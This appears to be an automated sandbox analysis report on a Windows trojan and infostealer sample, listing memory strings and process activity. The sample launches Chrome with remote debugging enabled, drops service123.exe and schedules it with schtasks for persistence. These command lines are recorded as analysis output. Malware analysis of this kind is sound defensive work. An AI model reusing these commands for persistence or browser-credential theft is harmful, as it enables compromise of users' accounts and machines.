Source: chrome.exe, 0000000A.00000003.2732684290.00002BF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732958183.00002BF001188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733348379.00002BF000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733057142.00002BF00120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 0000000A.00000003.2716336710.00002BB4006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732958183.00002BF001188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733348379.00002BF000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733057142.00002BF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2755341395.00002BB400744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 0000000A.00000002.2755653167.00002BB40080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 0000000A.00000002.2755447916.00002BB40078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 0000000A.00000002.2755447916.00002BB40078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 0000000A.00000002.2755341395.00002BB400744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2756354176.00002BF0000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2756354176.00002BF0000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2756354176.00002BF0000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758025493.00002BF000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2756354176.00002BF0000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000000A.00000002.2758960206.00002BF000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772214843.00002BF001068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766855860.00002BF0007AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000000A.00000002.2771807815.00002BF000F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758216823.00002BF0003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767494929.00002BF0008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000000A.00000002.2771807815.00002BF000F48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 0000000A.00000002.2758216823.00002BF0003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2765999171.00002BF0006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767494929.00002BF0008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 0000000A.00000002.2771807815.00002BF000F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758216823.00002BF0003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767494929.00002BF0008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 0000000A.00000003.2729456830.00002BF000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768483451.00002BF000A13000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768602982.00002BF000A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 0000000A.00000002.2756858430.00002BF0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000000A.00000002.2769104563.00002BF000B58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2756354176.00002BF0000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767729319.00002BF0008EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2757279934.00002BF0002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000000A.00000003.2725987153.00002BF0006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2770769812.00002BF000E3E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2771540244.00002BF000EEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 0000000A.00000002.2758799139.00002BF000504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000000A.00000003.2729456830.00002BF000F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768483451.00002BF000A13000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768602982.00002BF000A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 0000000A.00000003.2732684290.00002BF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732958183.00002BF001188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733057142.00002BF00120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 0000000A.00000002.2768602982.00002BF000A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000000A.00000002.2755949086.00002BF000078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000000A.00000002.2756259824.00002BF0000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 0000000A.00000002.2756858430.00002BF0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 0000000A.00000002.2767120938.00002BF00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758799139.00002BF000504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767184883.00002BF00082D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772335276.00002BF0010EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000000A.00000002.2767120938.00002BF00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758799139.00002BF000504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767184883.00002BF00082D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772335276.00002BF0010EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 0000000A.00000002.2768676980.00002BF000A64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000000A.00000002.2756858430.00002BF0001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: file.exe, 00000000.00000003.2772624902.000000000709A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2771770683.000000000709A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2770313938.0000000007099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2772128484.000000000709A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2769459532.00002BF000C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000000A.00000002.2769520768.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732565315.00002BF000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2724345612.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000000A.00000002.2769520768.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732565315.00002BF000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2724345612.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000000A.00000002.2769520768.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2732565315.00002BF000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2724345612.00002BF000C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 0000000A.00000002.2765999171.00002BF0006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758389701.00002BF000480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000000A.00000003.2726356032.00002BF000EAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000A.00000002.2769459532.00002BF000C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 0000000A.00000002.2767248762.00002BF000854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char9e3
Source: chrome.exe, 0000000A.00000003.2732565315.00002BF000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2769663871.00002BF000CB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 0000000A.00000002.2771748561.00002BF000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772652439.00002BF001150000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 0000000A.00000002.2771748561.00002BF000F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0m
Source: chrome.exe, 0000000A.00000002.2755893446.00002BF00006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 0000000A.00000002.2756858430.00002BF0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768265428.00002BF000988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772214843.00002BF001068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767494929.00002BF0008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000000A.00000002.2756858430.00002BF0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2768265428.00002BF000988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2772214843.00002BF001068000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2767494929.00002BF0008A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000000A.00000002.2768373582.00002BF0009C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: file.exe, 00000000.00000003.2772624902.000000000709A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2771770683.000000000709A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2770313938.0000000007099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2772128484.000000000709A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2769319562.00002BF000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2758960206.00002BF000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766855860.00002BF0007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2759701816.00002BF00060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 0000000A.00000003.2733057142.00002BF00120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 0000000A.00000002.2758799139.00002BF000504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000000A.00000002.2768721175.00002BF000A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000000A.00000002.2755778959.00002BF00001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2759701816.00002BF00060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000000A.00000002.2756968138.00002BF00020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2760980452.00002BF000654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000000A.00000002.2758799139.00002BF000504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000000A.00000002.2766855860.00002BF0007C1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2757279934.00002BF0002D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA51B0 12_2_00DA51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 12_2_00DA3E20 12_2_00DA3E20
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 1108
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: pxpvtkpl ZLIB complexity 0.9945436774505589
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/7@11/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess504
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 0000000A.00000002.2766183014.00002BF000715000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe, 00000000.00000003.2763504094.0000000007071000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2770767650.0000000007071000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2324,i,14367847056113753818,18281237657679557093,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 1108
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2324,i,14367847056113753818,18281237657679557093,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
